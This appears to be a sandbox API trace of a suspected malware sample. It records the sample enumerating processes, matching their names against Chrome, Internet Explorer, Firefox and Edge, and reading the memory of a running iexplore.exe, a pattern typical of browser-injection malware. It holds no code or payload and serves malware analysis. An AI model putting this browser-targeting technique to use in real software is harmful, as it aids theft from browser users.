	[0246.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.452] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.452] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.452] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.453] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x95bc
	[0246.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.454] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0246.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.454] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.455] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0246.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.455] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x95c0
	[0246.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.456] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.457] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.457] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.457] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x95c4
	[0246.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.459] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0246.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.459] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.459] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0246.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.460] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0246.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x95c8
	[0246.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.461] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0246.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.461] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.461] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0246.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.462] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0246.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x95cc
	[0246.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.463] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0246.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.463] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.463] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0246.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.463] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0246.464] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x95d0
	[0246.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.464] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0246.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.465] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.467] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0246.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.467] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0246.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0246.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0246.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x95d4
	[0246.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.469] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0246.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.470] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.470] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0246.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.471] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0246.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x95d8
	[0246.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.472] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0246.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.473] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.473] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0246.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.473] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0246.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x95dc
	[0246.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.474] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0246.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.475] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.475] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0246.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.475] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.476] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0246.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x95e0
	[0246.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.476] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0246.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.477] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.477] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0246.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.477] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0246.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x95e4
	[0246.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.479] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0246.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.479] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.480] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0246.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.480] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0246.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x95e8
	[0246.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.482] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0246.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.482] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.483] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0246.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.483] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.483] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0246.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x95ec
	[0246.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.484] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0246.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.484] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.485] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0246.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.485] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0246.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x95f0
	[0246.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.487] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0246.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.487] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.488] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0246.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.488] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0246.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x95f4
	[0246.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.490] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0246.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.490] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.490] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0246.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.490] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.491] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0246.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x95f8
	[0246.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.492] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0246.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.492] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.492] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0246.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.492] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0246.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x95fc
	[0246.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.493] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0246.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.494] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.494] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0246.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.495] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.495] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0246.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9600
	[0246.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.496] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0246.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.545] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.545] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0246.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.546] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0246.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9604
	[0246.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.547] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0246.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.548] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.548] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0246.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.549] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0246.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9608
	[0246.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.550] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0246.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.551] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.551] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0246.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.552] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.552] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0246.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x960c
	[0246.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.553] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0246.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.554] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.554] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0246.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.555] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9610
	[0246.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.556] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0246.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.556] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0246.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.556] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0246.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.557] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.557] NtQueryInformationProcess (in: ProcessHandle=0x9610, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0246.557] ReadProcessMemory (in: hProcess=0x9610, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0246.557] ReadProcessMemory (in: hProcess=0x9610, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0246.557] ReadProcessMemory (in: hProcess=0x9610, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0246.557] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0246.558] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9614
	[0246.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.560] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0246.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
